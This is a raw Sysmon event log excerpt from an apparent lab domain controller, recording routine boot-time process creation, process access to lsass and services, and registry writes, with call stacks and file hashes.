13:34:14.944{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.944{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.938{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.925{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.924{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.918{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.918{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.908{59A5CD1D-8E44-6005-0A00-00000000A301}848936C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.898{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.901{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.901{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.843{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.898{59A5CD1D-8E44-6005-0A00-00000000A301}8482668C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.894{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.894{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.891{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.890{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:14.890{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:14.890{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.886{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.886{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.873{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 